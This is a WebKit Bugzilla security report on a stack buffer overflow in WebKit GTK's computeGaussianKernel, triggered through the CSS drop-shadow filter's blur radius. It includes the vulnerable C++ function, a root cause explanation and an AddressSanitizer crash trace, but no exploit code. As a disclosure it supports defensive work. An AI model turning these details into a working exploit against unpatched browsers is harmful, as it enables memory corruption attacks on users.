265659 – [TextureMapper][GTK] WebKit GTK computeGaussianKernel Stack Buffer Overflow Vulnerability for drop-shadow filter

Bug 265659 - [TextureMapper][GTK] WebKit GTK computeGaussianKernel Stack Buffer Overflow Vulnerability for drop-shadow filter

Summary: [TextureMapper][GTK] WebKit GTK computeGaussianKernel Stack Buffer Overflow V...

Status:	RESOLVED FIXED

Alias:	None

Product:	Security
Classification:	Unclassified
Component:	Security (show other bugs)
Version:	WebKit Local Build
Hardware:	PC Linux

Importance:	P3 Normal
Assignee:	Jonathan Bedard

URL:
Keywords:	Gtk, InRadar

Depends on:
Blocks:

Reported:	2023-12-01 05:29 PST by Park Sangwoo
Modified:	2023-12-14 16:11 PST (History)
CC List:	7 users (show)

See Also:

Attachments
PoC file (835 bytes, text/html) 2023-12-01 05:29 PST, Park Sangwoo	no flags	Details
WIP patch (681 bytes, patch) 2023-12-03 13:09 PST, Fujii Hironori	no flags	Details \| Formatted Diff \| Diff
test case 2 (125 bytes, text/html) 2023-12-03 13:41 PST, Fujii Hironori	no flags	Details
Patch (3.37 KB, patch) 2023-12-05 20:01 PST, Fujii Hironori	no flags	Details \| Formatted Diff \| Diff
View All Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.

Description Park Sangwoo 2023-12-01 05:29:27 PST

Created attachment 468832 [details]
PoC file

1. Vulnerability Title
a.	WebKit GTK computeGaussianKernel Stack Buffer Overflow Vulnerability
2. High-level overview of the vulnerability and the possible effect of using it
    1. The Stack Buffer Overflow Vulnerability exists in WebKit GTK computeGaussianKernel function.
    2. An Attacker must open a arbitrary generated HTML file to exploit this vulnerability.
3. Exact product that was found to be vulnerable including complete version information
    1. Ubuntu 22.04.3 LTS
4. Root Cause Analysis (recommended but not required)
    1. The vulnerability exists when referring to a stack memory area in the function `computeGaussianKernel` .
    2. Refer to the `radius` in the function `computeGaussianKernel`. This causes Stack Buffer Overflow.
    3. The lack of size validation for radius leads to a stack buffer overflow.

```cpp
static unsigned blurRadiusToKernelHalfSize(float radius)
{
    return ceilf(radius * 2 + 1);
}

static int computeGaussianKernel(float radius, std::array<float, SimplifiedGaussianKernelMaxHalfSize>& kernel, std::array<float, SimplifiedGaussianKernelMaxHalfSize>& offset)
{
    unsigned kernelHalfSize = blurRadiusToKernelHalfSize(radius);
    ASSERT(kernelHalfSize <= GaussianKernelMaxHalfSize);

    float fullKernel[GaussianKernelMaxHalfSize];

    fullKernel[0] = 1; 
    float sum = fullKernel[0];

    for (unsigned i = 1; i < kernelHalfSize; ++i) {
        fullKernel[i] = gauss(i, radius);   //====> crash here
        sum += 2 * fullKernel[i]; 
    }

    float scale = 1 / sum; 
    for (unsigned i = 0; i < kernelHalfSize; ++i)
        fullKernel[i] *= scale;

    unsigned simplifiedKernelHalfSize = kernelHalfSizeToSimplifiedKernelHalfSize(kernelHalfSize);
    kernel[0] = fullKernel[0];

    for (unsigned i = 1; i < simplifiedKernelHalfSize; i++) {
        unsigned offset1 = 2 * i - 1;
        unsigned offset2 = 2 * i;

        if (offset2 >= kernelHalfSize) {
            kernel[i] = fullKernel[offset1];
            offset[i] = offset1;
            break;
        }

        kernel[i] = fullKernel[offset1] + fullKernel[offset2];
        offset[i] = (fullKernel[offset1] * offset1 + fullKernel[offset2] * offset2) / kernel[i];
    }

    return simplifiedKernelHalfSize;
}
```

```cpp
=================================================================
==237950==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7f4bb2926dec at pc 0x7f4c093cc093 bp 0x7f4bb2926d90 sp 0x7f4bb2926d88
WRITE of size 4 at 0x7f4bb2926dec thread T9 (eadedCompositor)
    #0 0x7f4c093cc092 in WebCore::computeGaussianKernel(float, std::array<float, 6ul>&, std::array<float, 6ul>&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperGL.cpp:359:23
    #1 0x7f4c093cc092 in WebCore::TextureMapperGL::drawBlurred(WebCore::BitmapTexture const&, WebCore::FloatRect const&, float, WebCore::TextureMapperGL::Direction, bool) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperGL.cpp:872:36
    #2 0x7f4c093cf333 in WebCore::TextureMapperGL::applyDropShadowFilter(WTF::RefPtr<WebCore::BitmapTexture, WTF::RawPtrTraits<WebCore::BitmapTexture>, WTF::DefaultRefDerefTraits<WebCore::BitmapTexture> >, WebCore::DropShadowFilterOperation const&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperGL.cpp:1058:13
    #3 0x7f4c093d18f1 in WebCore::TextureMapperGL::applyFilter(WTF::RefPtr<WebCore::BitmapTexture, WTF::RawPtrTraits<WebCore::BitmapTexture>, WTF::DefaultRefDerefTraits<WebCore::BitmapTexture> >, WTF::RefPtr<WebCore::FilterOperation const, WTF::RawPtrTraits<WebCore::FilterOperation const>, WTF::DefaultRefDerefTraits<WebCore::FilterOperation const> > const&, bool) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperGL.cpp:1140:16
    #4 0x7f4c093ba606 in WebCore::BitmapTextureGL::applyFilters(WebCore::TextureMapper&, WebCore::FilterOperations const&, bool) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/BitmapTextureGL.cpp:180:28
    #5 0x7f4c093aef34 in WebCore::TextureMapperLayer::paintIntoSurface(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:680:40
    #6 0x7f4c093ae29f in WebCore::TextureMapperLayer::paintSelfAndChildrenWithIntermediateSurface(WebCore::TextureMapperPaintOptions&, WebCore::IntRect const&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:719:9
    #7 0x7f4c093ada93 in WebCore::TextureMapperLayer::paintSelfChildrenFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:653:17
    #8 0x7f4c093ac7d2 in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:744:9
    #9 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9
    #10 0x7f4c093a7b85 in WebCore::TextureMapperLayer::paintSelfAndChildren(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:295:16
    #11 0x7f4c093a8525 in WebCore::TextureMapperLayer::paintSelfAndChildrenWithReplica(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:331:5
    #12 0x7f4c093ac63a in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:746:9
    #13 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9
    #14 0x7f4c093a7b85 in WebCore::TextureMapperLayer::paintSelfAndChildren(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:295:16
    #15 0x7f4c093a8525 in WebCore::TextureMapperLayer::paintSelfAndChildrenWithReplica(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:331:5
    #16 0x7f4c093ac63a in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:746:9
    #17 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9
    #18 0x7f4c093a7b85 in WebCore::TextureMapperLayer::paintSelfAndChildren(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:295:16
    #19 0x7f4c093a8525 in WebCore::TextureMapperLayer::paintSelfAndChildrenWithReplica(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:331:5
    #20 0x7f4c093ac63a in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:746:9
    #21 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9
    #22 0x7f4c093a7b85 in WebCore::TextureMapperLayer::paintSelfAndChildren(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:295:16
    #23 0x7f4c093a8525 in WebCore::TextureMapperLayer::paintSelfAndChildrenWithReplica(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:331:5
    #24 0x7f4c093ac63a in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:746:9
    #25 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9
    #26 0x7f4c093a7b85 in WebCore::TextureMapperLayer::paintSelfAndChildren(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:295:16
    #27 0x7f4c093a8525 in WebCore::TextureMapperLayer::paintSelfAndChildrenWithReplica(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:331:5
    #28 0x7f4c093ac63a in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:746:9
    #29 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9
    #30 0x7f4c093a7b85 in WebCore::TextureMapperLayer::paintSelfAndChildren(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:295:16
    #31 0x7f4c093a8525 in WebCore::TextureMapperLayer::paintSelfAndChildrenWithReplica(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:331:5
    #32 0x7f4c093ac63a in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:746:9
    #33 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9
    #34 0x7f4c093a7b85 in WebCore::TextureMapperLayer::paintSelfAndChildren(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:295:16
    #35 0x7f4c093a8525 in WebCore::TextureMapperLayer::paintSelfAndChildrenWithReplica(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:331:5
    #36 0x7f4c093ac63a in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:746:9
    #37 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9
    #38 0x7f4c093a5810 in WebCore::TextureMapperLayer::paint(WebCore::TextureMapper&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:178:5
    #39 0x7f4c0844ed7c in WebKit::CoordinatedGraphicsScene::paintToCurrentGLContext(WebCore::TransformationMatrix const&, WebCore::FloatRect const&, unsigned int) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Shared/CoordinatedGraphics/CoordinatedGraphicsScene.cpp:76:23
    #40 0x7f4c0846e585 in WebKit::ThreadedCompositor::renderLayerTree() /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Shared/CoordinatedGraphics/threadedcompositor/ThreadedCompositor.cpp:251:14
    #41 0x7f4c08472c5f in WebKit::ThreadedCompositor::ThreadedCompositor(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned int)::$_0::operator()() const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Shared/CoordinatedGraphics/threadedcompositor/ThreadedCompositor.cpp:60:68
    #42 0x7f4c08472c5f in WTF::Detail::CallableWrapper<WebKit::ThreadedCompositor::ThreadedCompositor(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned int)::$_0, void>::call() /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/Function.h:53:39
    #43 0x7f4c0845b46f in WTF::Function<void ()>::operator()() const /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/Function.h:82:35
    #44 0x7f4c0845b46f in WebKit::CompositingRunLoop::updateTimerFired() /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Shared/CoordinatedGraphics/threadedcompositor/CompositingRunLoop.cpp:179:5
    #45 0x7f4c0846af2b in void std::__invoke_impl<void, void (WebKit::CompositingRunLoop::*&)(), WebKit::CompositingRunLoop*&>(std::__invoke_memfun_deref, void (WebKit::CompositingRunLoop::*&)(), WebKit::CompositingRunLoop*&) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/invoke.h:74:14
    #46 0x7f4c0846af2b in std::__invoke_result<void (WebKit::CompositingRunLoop::*&)(), WebKit::CompositingRunLoop*&>::type std::__invoke<void (WebKit::CompositingRunLoop::*&)(), WebKit::CompositingRunLoop*&>(void (WebKit::CompositingRunLoop::*&)(), WebKit::CompositingRunLoop*&) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/invoke.h:96:14
    #47 0x7f4c0846af2b in void std::_Bind<void (WebKit::CompositingRunLoop::* (WebKit::CompositingRunLoop*))()>::__call<void, 0ul>(std::tuple<>&&, std::_Index_tuple<0ul>) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/functional:420:11
    #48 0x7f4c0846af2b in void std::_Bind<void (WebKit::CompositingRunLoop::* (WebKit::CompositingRunLoop*))()>::operator()<void>() /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/functional:503:17
    #49 0x7f4c0846af2b in WTF::Detail::CallableWrapper<std::_Bind<void (WebKit::CompositingRunLoop::* (WebKit::CompositingRunLoop*))()>, void>::call() /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/Function.h:53:39
    #50 0x7f4c07f0b0b3 in WTF::Function<void ()>::operator()() const /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/Function.h:82:35
    #51 0x7f4c07f0b0b3 in WTF::RunLoop::Timer::fired() /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/RunLoop.h:195:33
    #52 0x7f4c04b07ed8 in WTF::RunLoop::TimerBase::TimerBase(WTF::RunLoop&)::$_3::operator()(void*) const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:177:16
    #53 0x7f4c04b07ed8 in WTF::RunLoop::TimerBase::TimerBase(WTF::RunLoop&)::$_3::__invoke(void*) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:169:43
    #54 0x7f4c04b05433 in WTF::RunLoop::$_0::operator()(_GSource*, int (*)(void*), void*) const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:53:28
    #55 0x7f4c04b05433 in WTF::RunLoop::$_0::__invoke(_GSource*, int (*)(void*), void*) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:45:5
    #56 0x7f4bfcb20c43 in g_main_context_dispatch (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x55c43) (BuildId: c74e800dfd5f72649d673b44292f4a817e45150b)
    #57 0x7f4bfcb76257  (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0xab257) (BuildId: c74e800dfd5f72649d673b44292f4a817e45150b)
    #58 0x7f4bfcb202b2 in g_main_loop_run (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x552b2) (BuildId: c74e800dfd5f72649d673b44292f4a817e45150b)
    #59 0x7f4c04b069c8 in WTF::RunLoop::run() /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:108:9
    #60 0x7f4c0499e9c8 in WTF::RunLoop::create(char const*, WTF::ThreadType, WTF::Thread::QOS)::$_1::operator()() const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/RunLoop.cpp:114:9
    #61 0x7f4c0499e9c8 in WTF::Detail::CallableWrapper<WTF::RunLoop::create(char const*, WTF::ThreadType, WTF::Thread::QOS)::$_1, void>::call() /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/Function.h:53:39
    #62 0x7f4c049a97ff in WTF::Function<void ()>::operator()() const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/Function.h:82:35
    #63 0x7f4c049a97ff in WTF::Thread::entryPoint(WTF::Thread::NewThreadContext*) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/Threading.cpp:250:5
    #64 0x7f4c04b147a8 in WTF::wtfThreadEntryPoint(void*) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/posix/ThreadingPOSIX.cpp:242:5
    #65 0x7f4bfc494ac2 in start_thread nptl/./nptl/pthread_create.c:442:8
    #66 0x7f4bfc526a3f  misc/../sysdeps/unix/sysv/linux/x86_64/clone3.S:81

Address 0x7f4bb2926dec is located in stack of thread T9 (eadedCompositor) at offset 76 in frame
    #0 0x7f4c093cbcbf in WebCore::TextureMapperGL::drawBlurred(WebCore::BitmapTexture const&, WebCore::FloatRect const&, float, WebCore::TextureMapperGL::Direction, bool) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperGL.cpp:856

  This frame has 6 object(s):
    [32, 76) 'fullKernel.i' (line 354) <== Memory access at offset 76 overflows this variable
    [112, 120) 'program' (line 857)
    [144, 168) 'kernel' (line 870)
    [208, 232) 'offset' (line 871)
    [272, 400) 'textureBlurMatrix' (line 877)
    [432, 560) 'ref.tmp53' (line 895)
HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
      (longjmp and C++ exceptions *are* supported)
Thread T9 (eadedCompositor) created by T0 here:
    #0 0x560a95b0a5dc in pthread_create (/home/fuzz/Downloads/webkitgtk-2.41.92/build/libexec/webkit2gtk-4.0/WebKitWebProcess+0x8a5dc) (BuildId: 993abfac4fe138f0c15349dccc801d74c501b984)
    #1 0x7f4c04b14593 in WTF::Thread::establishHandle(WTF::Thread::NewThreadContext*, std::optional<unsigned long>, WTF::Thread::QOS) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/posix/ThreadingPOSIX.cpp:292:17
    #2 0x7f4c049a9e31 in WTF::Thread::create(char const*, WTF::Function<void ()>&&, WTF::ThreadType, WTF::Thread::QOS) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/Threading.cpp:266:32
    #3 0x7f4c0499c7d8 in WTF::RunLoop::create(char const*, WTF::ThreadType, WTF::Thread::QOS) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/RunLoop.cpp:111:5
    #4 0x7f4c0845b0b9 in WebKit::CompositingRunLoop::CompositingRunLoop(WTF::Function<void ()>&&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Shared/CoordinatedGraphics/threadedcompositor/CompositingRunLoop.cpp:43:17
    #5 0x7f4c0846b26d in std::_MakeUniq<WebKit::CompositingRunLoop>::__single_object std::make_unique<WebKit::CompositingRunLoop, WebKit::ThreadedCompositor::ThreadedCompositor(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned int)::$_0>(WebKit::ThreadedCompositor::ThreadedCompositor(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned int)::$_0&&) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/unique_ptr.h:962:34
    #6 0x7f4c0846b26d in decltype(auto) WTF::makeUnique<WebKit::CompositingRunLoop, WebKit::ThreadedCompositor::ThreadedCompositor(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned int)::$_0>(WebKit::ThreadedCompositor::ThreadedCompositor(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned int)::$_0&&) /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/StdLibExtras.h:596:12
    #7 0x7f4c0846b26d in WebKit::ThreadedCompositor::ThreadedCompositor(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned int) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Shared/CoordinatedGraphics/threadedcompositor/ThreadedCompositor.cpp:60:28
    #8 0x7f4c0846aff4 in WebKit::ThreadedCompositor::create(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned int) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Shared/CoordinatedGraphics/threadedcompositor/ThreadedCompositor.cpp:54:26
    #9 0x7f4c09262071 in WebKit::LayerTreeHost::LayerTreeHost(WebKit::WebPage&, unsigned int) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/WebProcess/WebPage/CoordinatedGraphics/LayerTreeHost.cpp:82:20
    #10 0x7f4c0925b38d in std::_MakeUniq<WebKit::LayerTreeHost>::__single_object std::make_unique<WebKit::LayerTreeHost, WebKit::WebPage&, unsigned long>(WebKit::WebPage&, unsigned long&&) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/unique_ptr.h:962:34
    #11 0x7f4c0925b38d in decltype(auto) WTF::makeUnique<WebKit::LayerTreeHost, WebKit::WebPage&, unsigned long>(WebKit::WebPage&, unsigned long&&) /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/StdLibExtras.h:596:12
    #12 0x7f4c0925b38d in WebKit::DrawingAreaCoordinatedGraphics::enterAcceleratedCompositingMode(WebCore::GraphicsLayer*) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/WebProcess/WebPage/CoordinatedGraphics/DrawingAreaCoordinatedGraphics.cpp:596:27
    #13 0x7f4c0925afda in WebKit::DrawingAreaCoordinatedGraphics::enterAcceleratedCompositingModeIfNeeded() /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/WebProcess/WebPage/CoordinatedGraphics/DrawingAreaCoordinatedGraphics.cpp:293:5
    #14 0x7f4c0916d290 in WebKit::WebPage::WebPage(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/WebProcess/WebPage/WebPage.cpp:799:24
    #15 0x7f4c0916831e in WebKit::WebPage::create(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/WebProcess/WebPage/WebPage.cpp:492:31
    #16 0x7f4c08c9203c in WebKit::WebProcess::createWebPage(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/WebProcess/WebProcess.cpp:856:21
    #17 0x7f4c07912bd1 in auto void IPC::callMemberFunction<WebKit::WebProcess, WebKit::WebProcess, void (WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters> >(WebKit::WebProcess*, void (WebKit::WebProcess::*)(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>&&)::'lambda'(auto&&...)::operator()<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>(auto&&...) const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Platform/IPC/HandleMessage.h:136:13
    #18 0x7f4c07912bd1 in WebKit::WebProcess std::__invoke_impl<void, void IPC::callMemberFunction<WebKit::WebProcess, WebKit::WebProcess, void (WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters> >(WebKit::WebProcess*, void (WebKit::WebProcess::*)(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>&&)::'lambda'(auto&&...), WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>(std::__invoke_other, WebKit::WebProcess&&, WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>&&, WebKit::WebPageCreationParameters&&) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/invoke.h:61:14
